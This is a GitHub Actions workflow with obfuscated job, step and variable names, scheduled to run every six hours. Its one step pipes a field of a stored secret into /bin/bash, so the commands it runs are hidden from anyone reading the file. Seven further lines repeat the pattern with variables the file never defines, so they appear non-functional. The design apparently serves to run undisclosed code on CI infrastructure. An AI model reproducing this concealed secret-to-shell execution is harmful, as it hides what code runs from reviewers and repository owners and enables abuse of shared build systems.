name: xkakllk
on:
  workflow_dispatch:
  schedule:
    - cron: '34 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xkakllk
        env:
          me1065: ${{ secrets.me1065 }}
        run: |
          echo $me1065 | jq -r .ehkki00 | /bin/bash
          echo $mywa032 | jq -r .w82 | /bin/bash
          echo $dhbe24306 | jq -r .mslz9 | /bin/bash
          echo $b062 | jq -r .cjj091 | /bin/bash
          echo $kdi57 | jq -r .aq103 | /bin/bash
          echo $vejw16889 | jq -r .vs5666 | /bin/bash
          echo $t200 | jq -r .esrkv0891 | /bin/bash
          echo $y237 | jq -r .z636 | /bin/bash

